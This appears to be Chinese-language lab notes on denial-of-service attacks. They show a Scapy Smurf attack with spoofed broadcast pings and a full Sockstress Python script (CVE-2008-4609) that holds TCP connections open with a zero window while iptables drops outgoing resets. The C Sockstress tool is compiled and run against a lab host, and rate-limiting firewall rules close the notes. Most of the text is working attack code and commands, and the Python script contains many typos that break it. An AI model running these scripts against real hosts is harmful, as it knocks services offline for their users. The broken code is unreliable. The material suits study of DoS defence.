Smurf攻击 世界上最古老的DDOS攻击技术 - 向广播地址发送伪造源地址的ICMP echo Request (ping) 包 - LAN所有计算机向伪造源地址返回响应包 - 对现代操作系统几乎无效(不响应目标为广播的ping) Scapy - i=IP() - i.dst="1.1.1.255" - p=ICMP() - p.display() - r=(i/p) - send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1) |
msfadmin@metasploit:~$ ifconf
192.168.1.119
root@K:~# scapy
WARNING: NO route found for IPV6 destination :: (no default route?)
welcome to Scapy (2.3.2)
>>> i=IP()
>>> i.src="192.168.1.119"
>>> i.dst="192.168.1.255"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 192.168.1.119
dst= 192.168.1.255
\options\
>>> p=ICMP()
>>> p.display()
###[ ICMP ]###
type=echo-request
code=0
chksum=None
id=0x0
seq=0x0
>>> send(i/p)
.
Sent 1 packets
>>> r=send(i/p)
.
Sent 1 packets
>>> r.display()
Traceback (most recent call last):
File "<console>", line 1, in <module>
AttributeError: 'NoneType' object has no attribute 'display'
>>> send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
msfadmin@metasploit:~$ sudo tcpdump -i eth0
Sockstress 2008年由Jack C.Louis发现 针对TCP服务的拒绝五福攻击 - 消耗被工具目标系统资源 - 与攻击目标建立大量socket链接 - 完成三次握手,最后的ACK包 windows 大小为0(客户端不接收数据) - 攻击者资源消耗小(CPU、内存、带宽) - 异步攻击,单机可拒绝服务高配资源服务器 - Window 窗口实现的TCP流控 |
root@K:~# cp /media/sf_D_DRIVE/socketress.py .
----------------------------------------------------------------------
[sockstress.py]
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scayp.all import *
from time import sleep
import thread
import logging
import os
import signal
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
if len(sys.argv) !=4:
print "用法: ./sock_stress.py [目标IP] [端口] [线程数]"
print "举例: ./sock_stress.py 10.0.0.5 21 20 ## 请确定呗攻击端口处于开放状态"
sys.exit()
target = str(sys.argv[1])
dstport = int(sys.argv[2])
threads = int(sys.argv[3])
## 攻击函数
def sockstress(target,dstport):
while 0==0;
try:
x = random.randint(0,65535)
response = srl(IP(dst=target)/TCP(sport=x,dport=dstport,flags='S'),timeout=1,verbose=0)
send(IP(dst=target)/ TCP(dsport=dstport,sport=x,window=0,flags='A',ack=(response[TCP].seq + 1))/'\x00\x00',verbose=0)
except:
pass
## 停止攻击函数
def shutdown(signal, frame):
print '正在恢复 iptables 规则'
os.system('iptable -D OUTPUT -p tcp --tcp-flas RST RST -d ' + target + ' -j DROP')
sys.exit()
## 添加iptables规则
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')
signal.signal(signal.SIGINT, shutdown)
## 多线程攻击
print "\n攻击正在进行...按 Ctrl+C 停止攻击"
for x in range(0,threads):
thread.start_new_thread(sockstress, (target,dstport))
## 永远执行
while 0==0:
sleep(1)
----------------------------------------------------------------------
root@K:~# ./sockstress.py
WARNING: No route found for IPV6 destination :: (no default route?)
用法: ./sock_stress.py [目标IP] [端口] [线程数]
举例: ./sock_stress.py 10.0.0.5 21 20 ## 请确定呗攻击端口处于开放状态
root@K:~# ./sockstress.py 192.168.1.119 21 200
WARNING: No route found for IPV6 destination :: (no default route?)
攻击正在进行...按 Ctrl+C 停止攻击
root@K:~# iptable -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.119 tcp flags:RST/RST
root@K:~# ifconfig
192.168.1.116
root@K:~# ping 192.168.1.119
root@K:~# ifconfig
10.0.2.15
msfadmin@metasploit:~$ sudo netstat -pantu | grep ESTAB
msfadmin@metasploit:~$ sudo netstat -pantu | grep ESTAB | wc -l
654
msfadmin@metasploit:~$ free -m //内存使用量
root@K:~# nc 192.168.1.119 21
Sockstress Python 攻击脚本 - ./sockstress.py 1.1.1.1 21 200 C攻击脚本 - http://github.com/defuse/sockstress - gcc -Wall -c sockstress.c - gcc -pthread -o sockstress sockstress.o - ./sockstress 1.1.1.1:80 eth0 - ./sockstress 1.1.1.1:80 eth0 -p payloads/http 防火墙规则 - iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP |
root@K:~/sockstree-master# gcc -Wall -c sockstress.c
root@K:~/sockstree-master# gcc -pthread -o sockstress sockstress.o
root@K:~/sockstree-master# ./sockstress
SOCKSTRESS - CVE-2008-4609 | havoc@defuase.ca
[!] Too feww arguments
Usage: ./sockstress <ip>:<port><interface> [-p paload] [-d delay]
<ip> Victim IP address
<port> Victim port
<interface> Local network interface (e.g. eth0)
-p payload File containing data to send after connecting
Payload can be at most 1000 bytes
-d delay Microsecnds between SYN packets (default: 10000)
-h Help menu
**You must configure your firewall to drop TCP reset packets sent to <ip>**
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/
dns_a dnx_axfr http smtp
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
root@K:~/sockstree-master# cat payloads/
dns_a dnx_axfr http smtp
root@K:~/sockstree-master# cat payloads/dns_axfr
root@K:~/sockstree-master# cat payloads/http
root@K:~/sockstree-master# cat payloads/smtp
HELO gmail.com
MAIL FROM: foo@gmail.com
RCPT TO: victiom@victim-domain.com
DATA
Subject: AAAAAAAAAAAAA
BBBBBBBBBBBBBBBBBBB
.
QUIT
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
SOCKSTRESS - CVE-2008-4609 | havoc@defuase.ca
[+] Sending packets from eth0 (192.168.1.116)
[+] Attacking: 192.168.1.119:80
^C SENT: syn: 1333 ack: 133 RECV: synack: 1333 ack: 0 rst: 1333
root@K:~/sockstree-master# iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
root@K:~/sockstree-master# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.119 tcp flags:RST/RST
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
SOCKSTRESS - CVE-2008-4609 | havoc@defuase.ca
[+] Sending packets from eth0 (192.168.1.116)
[+] Attacking: 192.168.1.119:80
[+] SENT: syn: 1333 ack: 133 RECV: synack: 1333 ack: 0 rst: 0
Sockstress 防御措施 - 直到今天sockstress攻击仍然是一种很有效的DoS攻击方式 - 由于建立完整的TCP三步握手,因此使用syn cookie防御无效 - 根本的防御方法是采用白名单(不实际) - 折中对策:限制单位时间内每IP建的TCP连接数 封杀每30秒与80端口建立连接超过10个IP的地址 iptable -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --set iptable -l INPUT -p tcp --dport 80 -m state --state NEW -m recent -- update --seconds 30 --hitcount 10 -j DROP 以上规则对DDOS攻击无效 |
msfadmin@metasploit:~$ iptable -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
msfadmin@metasploit:~$ iptable -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP